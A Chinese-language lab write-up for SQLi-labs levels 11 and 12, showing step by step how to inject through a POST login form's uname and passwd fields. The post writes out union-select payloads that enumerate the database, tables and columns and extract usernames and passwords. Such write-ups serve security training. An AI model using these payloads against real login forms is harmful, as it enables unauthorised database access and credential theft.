SQLI-labs-第十一关和第十二关

目录

第十一关

1、判断注入点

2、判断字段值

3、爆库名

4、爆表名

5、爆字段名,以users表为例

6、爆值

第十二关

1、判断注入点

知识点:POST方式联合查询注入

第十一关

思路:

1、判断注入点

我们随便输入一个用户名和密码,使用Burpsuite抓包

抓到的包发送到repeater模块,查看正常回显是什么内容

这里有uname和passwd两个值,这两个都可能是注入点,我们都可以尝试一下

首先在uname的值加上单引号'

数据库语句报错,在passwd同理

说明这两个字段都存在注入点

判断注入点属于什么类型

输入uname=admin' and 1=1#

回显正常

输入uname=admin' and 1=2#

结果没有回显,说明这个注入点是单引号闭合错误的注入漏洞

2、判断字段值

使用order by 语句

uname=admin' order by 1#

从1开始尝试,试到3的时候报错,说明当前表的字段有2个

3、爆库名

做到这一步的时候,发现在uname这个点注入是没有回显信息的,只显示了正常的数据。需要在passwd这点注入才会回显,因为我们在最后加入了注释符#,会把passwd这个字段的值給注释掉,导致没有数据的正常回显。

使用联合查询语句 union

uname=admin&passwd=1' union select 1,database() #

4、爆表名

使用group_concat()函数

uname=admin&passwd=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #

5、爆字段名,以users表为例

uname=admin&passwd=1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' #

6、爆值

使用concat_ws函数

uname=admin&passwd=1' union select 1,concat_ws(',',id,username,password) from security.users limit 0,1 #

通过修改limit 后面的值,就可以得到全部信息


第十二关

第十二关的思路跟第十一关的一样,只不过是双引号的闭合问题

1、判断注入点

接下来的步骤参考上面


这篇文章就写到这里,哪里有疑问或不足的欢迎指出!

相关推荐
步行cgn几秒前
MySQL 报错:Access denied for user ‘root‘@‘localhost‘ 详解
java·数据库·spring
for_ever_love__1 小时前
Redis 数据类型全景:五种基础类型怎么用、什么时候用
数据库·redis·数据类型·hash·使用场景·zset·排行榜
SmartSoftHelp开发辅助优化1 小时前
SmartSoftHelp DeepCore XSuite Pro Global Eco AIAgent 2026.V29 专业国际版
数据库·oracle
honsor1 小时前
以太网温湿度传感器:RJ45直连机房的环境监控新方案
运维·网络·数据库·物联网·安全·云计算·github
西索斯coding1 小时前
Kimi k2.7-code-highspeed 接入 Cline 教程:baseURL 路由变更 + model_id 正确写法
java·服务器·数据库·ai
浪子明X2 小时前
MongoDB 迁移方案评审:用双写窗口和回放样本控制切换风险
数据库·mongodb
stark张宇2 小时前
InnoDB锁机制全景图:全局锁、表锁、行锁、意向锁到底怎么用?
数据库·后端
坊钰2 小时前
【LangChain框架入门级】10. 文本向量与向量数据库(Embedding / Redis / Pinecone / MMR)
数据库·python·langchain·embedding
Omics Pro2 小时前
研究证实AI虚拟细胞可用于药物靶点发现
数据库·人工智能·算法·机器学习·自然语言处理
好奇的菜鸟2 小时前
GORM 入门(二):从 database/sql 平滑过渡到 GORM
数据库·sql